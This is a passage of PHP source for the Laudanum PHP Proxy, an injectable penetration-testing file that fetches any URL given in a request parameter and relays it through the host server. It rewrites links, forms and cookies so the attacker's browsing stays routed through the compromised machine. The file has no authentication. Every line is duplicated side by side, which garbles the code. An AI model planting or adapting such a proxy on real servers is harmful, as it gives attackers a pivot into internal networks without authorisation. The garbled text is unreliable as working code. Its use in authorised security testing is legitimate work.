"http://www.w3.org/TR/html4/strict.dtd"> "http://www.w3.org/TR/html4/strict.dtd">
<html> <html>
<head> <head>
<title>Laudanum PHP Proxy</title> <title>Laudanum PHP Proxy</title>
</head> </head>
<body> <body>
<h1>Fatal Error!</h1> <h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p> <p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p> <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr> <hr>
<address> <address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/> Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address> </address>
</body> </body>
</html>'); </html>');
} }
} }
set_error_handler('error_handler'); set_error_handler('error_handler');
function geturlarray($u) { function geturlarray($u) {
// creates the url array, addes a scheme if it is missing and retries parsing // creates the url array, addes a scheme if it is missing and retries parsing
$o = parse_url($u); $o = parse_url($u);
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
if (!isset($o["path"])) { $o["path"] = "/"; } if (!isset($o["path"])) { $o["path"] = "/"; }
return $o; return $o;
} }
function buildurl ($u) { function buildurl ($u) {
// build the url from the url array // build the url from the url array
// this is used because the built in function isn't // this is used because the built in function isn't
// avilable in all installs of php // avilable in all installs of php
if (!isset($u["host"])) { return null; } if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"]) ? $u["scheme"] : "http"; $s = isset($u["scheme"]) ? $u["scheme"] : "http";
$s .= "://" . $u["host"]; $s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : ""; $s .= isset($u["port"]) ? ":" . $u["port"] : "";
$s .= isset($u["path"]) ? $u["path"] : "/"; $s .= isset($u["path"]) ? $u["path"] : "/";
$s .= isset($u["query"]) ? "?" . $u["query"] : ""; $s .= isset($u["query"]) ? "?" . $u["query"] : "";
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
return $s; return $s;
} }
function buildurlpath ($u) { function buildurlpath ($u) {
//gets the full url and attempts to remove the file at the end of the url //gets the full url and attempts to remove the file at the end of the url
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
if (!isset($u["host"])) { return null; } if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"])? $u["scheme"] : "http"; $s = isset($u["scheme"])? $u["scheme"] : "http";
$s .= "://" . $u["host"]; $s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : ""; $s .= isset($u["port"]) ? ":" . $u["port"] : "";
$path = isset($u["path"]) ? $u["path"] : "/"; $path = isset($u["path"]) ? $u["path"] : "/";
// is the last portion of the path a file or a dir? // is the last portion of the path a file or a dir?
// assume if there is a . it is a file // assume if there is a . it is a file
// if it ends in a / then it is a dir // if it ends in a / then it is a dir
// if neither, than assume dir // if neither, than assume dir
$dirs = explode("/", $path); $dirs = explode("/", $path);
$last = $dirs[count($dirs) - 1]; $last = $dirs[count($dirs) - 1];
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
// its a file, remove the last chunk // its a file, remove the last chunk
$path = substr($path, 0, -1 * strlen($last)); $path = substr($path, 0, -1 * strlen($last));
} }
$s .= $path; $s .= $path;
return $s; return $s;
} }
function getfilename ($u) { function getfilename ($u) {
// returns the file name // returns the file name
// e.g. http://blah.com/dir/file.ext returns file.ext // e.g. http://blah.com/dir/file.ext returns file.ext
// technically, it is the last portion of the url, so there is a potential // technically, it is the last portion of the url, so there is a potential
// for a problem if a http://blah.com/dir returns a file // for a problem if a http://blah.com/dir returns a file
$s = explode("/", $u["path"]); $s = explode("/", $u["path"]);
return $s[count($s) - 1]; return $s[count($s) - 1];
} }
function getcontenttype ($headers) { function getcontenttype ($headers) {
// gets the content type // gets the content type
foreach($headers as $h) { foreach($headers as $h) {
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
return $out[1][0]; return $out[1][0];
} }
} }
} }
function getcontentencoding ($headers) { function getcontentencoding ($headers) {
foreach ($headers as $h) { foreach ($headers as $h) {
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
return $out[1][0]; return $out[1][0];
} }
} }
} }
function removeheader($header, $headers) { function removeheader($header, $headers) {
foreach (array_keys($headers) as $key) { foreach (array_keys($headers) as $key) {
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
unset($headers[$key]); unset($headers[$key]);
return $headers; return $headers;
} }
} }
} }
function rewritecookies($headers) { function rewritecookies($headers) {
// removes the path and domain from cookies // removes the path and domain from cookies
for ($i = 0; $i < count($headers); $i++) { for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
} }
} }
return $headers; return $headers;
} }
function getsessionid($headers) { function getsessionid($headers) {
for ($i = 0; $i < count($headers); $i++) { for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
return $out[1][0]; return $out[1][0];
} }
return "0"; return "0";
} }
function compatible_gzinflate($gzData) { function compatible_gzinflate($gzData) {
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
$i = 10; $i = 10;
$flg = ord( substr($gzData, 3, 1) ); $flg = ord( substr($gzData, 3, 1) );
if ( $flg > 0 ) { if ( $flg > 0 ) {
if ( $flg & 4 ) { if ( $flg & 4 ) {
list($xlen) = unpack('v', substr($gzData, $i, 2) ); list($xlen) = unpack('v', substr($gzData, $i, 2) );
$i = $i + 2 + $xlen; $i = $i + 2 + $xlen;
} }
if ( $flg & 8 ) if ( $flg & 8 )
$i = strpos($gzData, "\0", $i) + 1; $i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 16 ) if ( $flg & 16 )
$i = strpos($gzData, "\0", $i) + 1; $i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 2 ) if ( $flg & 2 )
$i = $i + 2; $i = $i + 2;
} }
return @gzinflate( substr($gzData, $i, -8) ); return @gzinflate( substr($gzData, $i, -8) );
} else { } else {
return false; return false;
} }
return false; return false;
} }
function rewrite ($d, $u) { function rewrite ($d, $u) {
$r = $d; $r = $d;
//rewrite images and links - absolute reference //rewrite images and links - absolute reference
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
//rewrite images and links - hard linked //rewrite images and links - hard linked
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
//rewrite images and links - relative reference //rewrite images and links - relative reference
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
//rewrite form - absolute reference //rewrite form - absolute reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r); $r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
//rewrite form - hard linked //rewrite form - hard linked
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r); $r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
//rewrite form - relative reference //rewrite form - relative reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r); $r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
return $r; return $r;
} }
/* Initialize some variables we need again and again. */ /* Initialize some variables we need again and again. */
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; $url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
if ($url == "") { if ($url == "") {
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
} }
if ($url == "") { if ($url == "") {
?> ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> "http://www.w3.org/TR/html4/strict.dtd">
<html> <html>
<head> <head>
<title>Laudanum PHP Proxy</title> <title>Laudanum PHP Proxy</title>
<link rel="stylesheet" href="style.css" type="text/css"> <link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript"> <script type="text/javascript">
function init() { function init() {
document.proxy.url.focus(); document.proxy.url.focus();
} }
</script> </script>
</head> </head>
<body onload="init()"> <body onload="init()">
<h1>Laudanum PHP Proxy</h1> <h1>Laudanum PHP Proxy</h1>
<form method="GET" name="proxy"> <form method="GET" name="proxy">
<input type="text" name="laudurl" size="70"> <input type="text" name="laudurl" size="70">
</form> </form>
<hr> <hr>
<address> <address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/> Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address> </address>
</body> </body>
</html> </html>
<?php <?php
} else { } else {
$url_c = geturlarray($url); $url_c = geturlarray($url);
$params = array_merge($_GET, $_POST); $params = array_merge($_GET, $_POST);
//don't pass throught the parameter we are using //don't pass throught the parameter we are using
unset($params["laudurl"]); unset($params["laudurl"]);
//create the query or post parameters //create the query or post parameters
$query = http_build_query($params); $query = http_build_query($params);
if ($query != "") { if ($query != "") {
$url_c["query"] = $query; $url_c["query"] = $query;
} }
//get the files //get the files
$fp = fopen(buildurl($url_c), "rb"); $fp = fopen(buildurl($url_c), "rb");
// use the headers, except the response code which is popped off the array // use the headers, except the response code which is popped off the array
$headers = $http_response_header; $headers = $http_response_header;
// pop // pop
array_shift($headers); array_shift($headers);
// fix cookies // fix cookies
$headers = rewritecookies($headers); $headers = rewritecookies($headers);
$ctype = getcontenttype($headers); $ctype = getcontenttype($headers);
$cencoding = getcontentencoding($headers); $cencoding = getcontentencoding($headers);
// we will remove gzip encoding later, but we need to remove the header now // we will remove gzip encoding later, but we need to remove the header now
// before it is added to the response. // before it is added to the response.
if ($cencoding == "gzip") if ($cencoding == "gzip")
$headers = removeheader("Content-Encoding", $headers); $headers = removeheader("Content-Encoding", $headers);
// set headers for response to client // set headers for response to client
if (preg_match("/text|image/", $ctype)) { if (preg_match("/text|image/", $ctype)) {
header_remove(); header_remove();
// the number of headers can change due to replacement // the number of headers can change due to replacement
$i = 0; $i = 0;
while ($i < count($headers)) { while ($i < count($headers)) {
if (strpos($headers[$i], "Set-Cookie:") == false) if (strpos($headers[$i], "Set-Cookie:") == false)
// replace headers // replace headers
header($headers[$i], true); header($headers[$i], true);
else else
// if it is the first cookie, replace all the others. Otherwise add // if it is the first cookie, replace all the others. Otherwise add
header($headers[$i], false); header($headers[$i], false);
$i++; $i++;
} }
} else { } else {
header("Content-Disposition: attachment; filename=" . getfilename($url_c)); header("Content-Disposition: attachment; filename=" . getfilename($url_c));
} }
// get data // get data
if (preg_match("/text/",$ctype)) { //text if (preg_match("/text/",$ctype)) { //text
//it is a text format: html, css, js //it is a text format: html, css, js
$data = ""; $data = "";
while (!feof($fp)) { while (!feof($fp)) {
$data .= fgets($fp, 4096); $data .= fgets($fp, 4096);
} }
// uncompress it so it can be rewritten // uncompress it so it can be rewritten
if ($cencoding == "gzip") if ($cencoding == "gzip")
$data = compatible_gzinflate($data); $data = compatible_gzinflate($data);
// rewrite all the links and such // rewrite all the links and such
echo rewrite($data, $url_c); echo rewrite($data, $url_c);
} else { } else {
// binary format or something similar, let it go through // binary format or something similar, let it go through
fpassthru($fp); fpassthru($fp);
fclose($fp); fclose($fp);
} }
} }
?> ?>